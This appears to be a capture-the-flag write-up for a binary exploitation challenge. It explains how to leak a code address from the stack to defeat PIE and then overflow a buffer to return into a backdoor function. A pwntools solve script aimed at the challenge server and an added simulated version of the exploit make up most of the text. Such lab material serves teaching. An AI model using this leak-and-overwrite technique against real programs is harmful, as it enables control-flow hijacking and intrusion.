> [name=Curious]
## Train of Thought & Solution
First, let's load `chal` into IDA:

We can observe that `chal` lets us read any 8-byte slot from the stack (selected by an index we supply) and then triggers a stack buffer overflow (BOF). Furthermore, `chal` contains a `backdoor` function:

Since `chal` has PIE enabled, we can use the arbitrary stack read to leak a residual code address (a pointer into the binary that is still sitting on the stack) and subtract its known offset within the binary to recover the code base. Then, with the BOF, we overwrite the saved return address with the address of `backdoor`, and the challenge is solved.
Let's take a look at the relevant asm and the stack in `gdb`:


We need to input `-5` to obtain the address of `main` (the leaked value sits at offset `0x11e8` in the binary); subtracting that offset gives the code base, and adding the offset of `backdoor` (`0x11ce`) gives the address to return to.
Solve script:
```python
from pwn import *

# r = process('./chal')
r = remote('lotuxctf.com', 10006)

# Step 1: arbitrary stack read. Index -5 holds a residual pointer into main,
# which chal prints as a decimal integer.
r.sendlineafter(b'> ', b'-5')
codebase = int(r.recvline().strip()) - 0x0011e8  # 0x11e8 = offset of the leaked address in the binary
info(f'codebase : {hex(codebase)}')

# Step 2: stack BOF. 0x28 bytes of padding reach the saved return address,
# which we overwrite with backdoor (offset 0x11ce from the code base).
backdoor = codebase + 0x0011ce
r.sendlineafter(b'> ', b'a' * 0x28 + p64(backdoor))
r.interactive()
```
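The script above only works against the live service. As an added example (not part of the original writeup and not pwntools code), the same leak-then-overwrite logic is factored into plain Python functions with the sanity check a practitioner wants before sending the payload: the computed code base must be page aligned, otherwise the wrong stack slot was leaked or the offset is wrong. The `FakeChal` class is a constructed stand-in for the remote service that mimics the behaviour the writeup describes (a signed-decimal 8-byte stack read and a line-based overflow); the offsets `0x11e8`, `0x11ce`, `0x28` and the index `-5` are taken from the writeup, while the base address `0x555555554000` used in the usage is an assumed example value.

```python
import struct

MASK64 = (1 << 64) - 1
MAIN_OFFSET = 0x11e8      # offset of the leaked main address inside the binary (from the writeup)
BACKDOOR_OFFSET = 0x11ce  # offset of backdoor() inside the binary (from the writeup)
RET_OFFSET = 0x28         # bytes between the start of the buffer and the saved return address
LEAK_INDEX = -5           # stack slot that holds the residual pointer into main


def parse_leak(line: bytes) -> int:
    """chal prints the 8-byte slot as a decimal integer; normalise it to unsigned 64-bit."""
    return int(line.strip()) & MASK64


def compute_codebase(leaked: int, offset: int = MAIN_OFFSET) -> int:
    """Subtract the known in-binary offset and check the result is page aligned.

    A PIE base always ends in 0x000; anything else means the leak came from the
    wrong slot or the offset was taken from the wrong instruction."""
    base = (leaked - offset) & MASK64
    if base & 0xfff:
        raise ValueError(f"codebase {base:#x} is not page aligned: wrong index or offset")
    return base


def build_payload(codebase: int, padding: int = RET_OFFSET) -> bytes:
    """Padding up to the saved return address, then the address of backdoor (little-endian)."""
    target = codebase + BACKDOOR_OFFSET
    payload = b"a" * padding + struct.pack("<Q", target)
    # A newline byte inside the packed address would terminate a line-based read early.
    if b"\n" in payload:
        raise ValueError("payload contains a newline and would be truncated by the read")
    return payload


class FakeChal:
    """Constructed stand-in for the remote service (assumption: not the real chal binary).

    Slot LEAK_INDEX holds a pointer into main; the overflow overwrites the saved
    return address RET_OFFSET bytes into the buffer."""

    def __init__(self, codebase: int):
        self.codebase = codebase
        self.slots = {LEAK_INDEX: codebase + MAIN_OFFSET, 0: 0x1}

    def read_slot(self, idx: int) -> bytes:
        # Print like printf("%ld\n"): the slot is shown as a signed decimal.
        value = self.slots.get(idx, 0)
        if value >= 1 << 63:
            value -= 1 << 64
        return f"{value}\n".encode()

    def overflow(self, payload: bytes) -> int:
        """Return the address the function would 'return' to after the overflow."""
        line = payload.split(b"\n", 1)[0]  # gets()-style read stops at the first newline
        if len(line) < RET_OFFSET + 8:
            return 0  # return address not reached: no control
        return struct.unpack_from("<Q", line, RET_OFFSET)[0]

    def backdoor(self) -> int:
        return self.codebase + BACKDOOR_OFFSET


def exploit(chal: FakeChal) -> int:
    """Leak, compute the base, overflow; returns the address control lands on."""
    leaked = parse_leak(chal.read_slot(LEAK_INDEX))
    codebase = compute_codebase(leaked)
    return chal.overflow(build_payload(codebase))


if __name__ == "__main__":
    target = FakeChal(0x555555554000)  # assumed example base address
    landed = exploit(target)
    print(f"returned to {landed:#x}, backdoor is at {target.backdoor():#x}")
```

The alignment check is cheap insurance: when an exploit crashes against the remote service, the first question is whether the leak was right, and a base that does not end in `0x000` answers it before any payload is sent.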